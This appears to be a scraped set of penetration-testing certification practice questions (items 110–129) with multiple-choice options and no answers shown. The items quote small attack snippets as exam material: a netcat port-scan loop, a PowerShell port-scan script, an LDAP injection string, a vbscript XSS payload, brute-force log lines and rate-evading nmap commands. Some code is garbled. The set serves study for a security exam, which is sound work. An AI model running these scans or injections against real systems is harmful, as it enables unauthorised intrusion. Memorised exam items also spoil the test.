
#!/bin/bash

network='10.100.100'

ports='22 23 80 443'

for x in {1 .. 254};

do (nc -zv $network.$x $ports );

done

Which of the following would explain using this script instead of another tool?

A.

The typical tools could not be used against Windows systems.

B.

The configuration required the penetration tester to not utilize additional files.

C.

The Bash script will provide more thorough output.

D.

The penetration tester wanted to persist this script to run on reboot.

Full Access
Question # 110

A penetration tester captures SMB network traffic and discovers that users are mistyping the name of a fileshare server. This causes the workstations to send out requests attempting to resolve the fileshare server's name. Which of the following is the best way for a penetration tester to exploit this situation?

A.

Relay the traffic to the real file server and steal documents as they pass through.

B.

Host a malicious file to compromise the workstation.

C.

Reply to the broadcasts with a fake IP address to deny access to the real file server.

D.

Respond to the requests with the tester's IP address and steal authentication credentials.

Full Access
Question # 111

Which of the following is the most secure way to protect a final report file when delivering the report to the client/customer?

A.

Creating a link on a cloud service and delivering it by email

B.

Asking for a PGP public key to encrypt the file

C.

Requiring FTPS security to download the file

D.

Copying the file on a USB drive and delivering it by postal mail

Full Access
Question # 112

An executive needs to use Wi-Fi to connect to the company's server while traveling. While looking for available Wi-Fi connections, the executive notices an available access point to a hotel chain that is not available where the executive is staying. Which of the following attacks is the executive most likely experiencing?

A.

Data modification

B.

Amplification

C.

Captive portal

D.

Evil twin

Full Access
Question # 113

During an assessment, a penetration tester needs to perform a cloud asset discovery of an organization. Which of the following tools would most likely provide more accurate results in this situation?

A.

Pacu

B.

Scout Suite

C.

Shodan

D.

TruffleHog

Full Access
Question # 114

During a test of a custom-built web application, a penetration tester identifies several vulnerabilities. Which of the following would be the most interested in the steps to reproduce these vulnerabilities?

A.

Operations staff

B.

Developers

C.

Third-party stakeholders

D.

C-suite executives

Full Access
Question # 115

A penetration tester is taking screen captures of hashes obtained from a domain controller. Which of the following best explains why the penetration tester should immediately obscure portions of the images before saving?

A.

To maintain confidentiality of data/information

B.

To avoid disclosure of how the hashes were obtained

C.

To make the hashes appear shorter and easier to crack

D.

To prevent analysis based on the type of hash

Full Access
Question # 116

A penetration tester is trying to bypass an active response tool that blocks IP addresses that have more than 100 connections per minute. Which of the following commands would allow the tester to finish the test without being blocked?

A.

nmap -sU -p 1-1024 10.0.0.15

B.

nmap -p 22,25, 80, 3389 -T2 10.0.0.15 -Pn

C.

nmap -T5 -p 1-65535 -A 10.0.0.15

D.

nmap -T3 -F 10.0.0.15

Full Access
Question # 117

A penetration tester is conducting an assessment on 192.168.1.112. Given the following output:

[ATTEMPT] target 192.168.1.112 - login "root" - pass "abcde"

[ATTEMPT] target 192.168.1.112 - login "root" - pass "edcfg"

[ATTEMPT] target 192.168.1.112 - login "root" - pass "qazsw"

[ATTEMPT] target 192.168.1.112 - login "root" – pass “tyuio”

Which of the following is the penetration tester conducting?

A.

Port scan

B.

Brute force

C.

Credential stuffing

D.

DoS attack

Full Access
Question # 118

A penetration testing firm performs an assessment every six months for the same customer. While performing network scanning for the latest assessment, the penetration tester observes that several of the target hosts appear to be residential connections associated with a major television and ISP in the area. Which of the following is the most likely reason for the observation?

A.

The penetration tester misconfigured the network scanner.

B.

The network scanning tooling is not functioning properly.

C.

The IP ranges changed ownership.

D.

The network scanning activity is being blocked by a firewall.

Full Access
Question # 119

During an assessment, a penetration tester discovers the following code sample in a web application:

"(&(userid=*)(userid=*))(I(userid=*)(userPwd=(SHAl}a9993e364706816aba3e25717850c26c9cd0d89d==))

Which of the following injections is being performed?

A.

Boolean SQL

B.

Command

C.

Blind SQL

D.

LDAP

Full Access
Question # 120

During a code review assessment, a penetration tester finds the following vulnerable code inside one of the web application files:

<% String id = request.getParameter("id"); %>

Employee ID: <%= id %>

Which of the following is the best remediation to prevent a vulnerability from being exploited, based on this code?

A.

Parameterized queries

B.

Patch application

C.

Output encoding

Full Access
Question # 121

A security firm is discussing the results of a penetration test with a client. Based on the findings, the client wants to focus the remaining time on a critical network segment. Which of the following best describes the action taking place?

A.

Maximizing the likelihood of finding vulnerabilities

B.

Reprioritizing the goals/objectives

C.

Eliminating the potential for false positives

D.

Reducing the risk to the client environment

Full Access
Question # 122

A company developed a new web application to allow its customers to submit loan applications. A penetration tester is reviewing the application and discovers that the application was developed in ASP and used MSSQL for its back-end database. Using the application's search form, the penetration tester inputs the following code in the search input field:

IMG SRC=vbscript:msgbox ("Vulnerable_to_Attack") ; >originalAttribute="SRC"originalPath="vbscript;msgbox ("Vulnerable_to_Attack ") ;>"

When the tester checks the submit button on the search form, the web browser returns a pop-up windows that displays "Vulnerable_to_Attack." Which of the following vulnerabilities did the tester discover in the web application?

A.

SQL injection

B.

Command injection

C.

Cross-site request forgery

D.

Cross-site scripting

Full Access
Question # 123

A penetration tester was hired to test Wi-Fi equipment. Which of the following tools should be used to gather information about the wireless network?

A.

Kismet

B.

Burp Suite

C.

BeEF

D.

WHOIS

Full Access
Question # 124

Which of the following documents should be consulted if a client has an issue accepting a penetration test report that was provided?

A.

Rules of engagement

B.

Signed authorization letter

C.

Statement of work

D.

Non-disclosure agreement

Full Access
Question # 125

Given the following code:

$p = (80, 110, 25)

$network = (192.168.0)

$range = 1 .. 254

$ErrorActionPreference = 'silentlycontinue'

$Foreach ($add in $range)

$Foreach ($x in $p)

{ {$ip = "{0} . {1} -F $network, $add"

If (Test-Connection -BufferSize 32 -Count 1 -quiet -ComputerName $ip)

{$socket = new-object System.Net. Sockets. TcpClient (&ip, $x)

If ($socket. Connected) { $ip $p open"

$socket. Close () }

}

}}

Which of the following tasks could be accomplished with the script?

A.

Reverse shell

B.

Ping sweep

C.

File download

D.

Port scan

Full Access
Question # 126

A penetration tester is hired to test a client’s systems. The client's systems are hosted by the client at its headquarters. The production environment is hosted by a private cloud-hosting company. Which of the following would be the most important for the penetration tester to determine before beginning the test?

A.

Third-party asset restrictions

B.

Disallowed tests

C.

Physical locations of theinfrastructure

D.

Time-of-day restrictions

Full Access
Question # 127

During a client engagement, a penetration tester runs the following Nmap command and obtains the following output:

nmap -sV -- script ssl-enum-ciphers -p 443 remotehost

| TLS_ECDHE_ECDSA_WITH_RC4_128_SHA

| TLS_ECDHE_RSA_WITH_RC4_128_SHA

TLS_RSA_WITH_RC4_128_SHA (rsa 2048)

TLS_RSA_WITH_RC4_128_MD5 (rsa 2048)

Which of the following should the penetration tester include in the report?

A.

Old, insecure ciphers are in use.

B.

The 3DES algorithm should be deprecated.

C.

2,048-bit symmetric keys are incompatible with MD5.

D.

This server should be upgraded to TLS 1.2.

Full Access
Question # 128

Which of the following tools would help a penetration tester locate a file that was uploaded to a content management system?

A.

DirBuster

B.

Open VAS

C.

Scout Suite

D.

CeWL

Full Access
Question # 129

A penetration tester discovers during a recent test that an employee in the accounting department has been making changes to a payment system and redirecting money into a personal bank account. The penetration test was immediately stopped. Which of the following would be the BEST recommendation to prevent this type of activity in the future?

A.

Enforce mandatory employee vacations

B.

Implement multifactor authentication

C.

Install video surveillance equipment in the office

D.

Encrypt passwords for bank account information

Full Access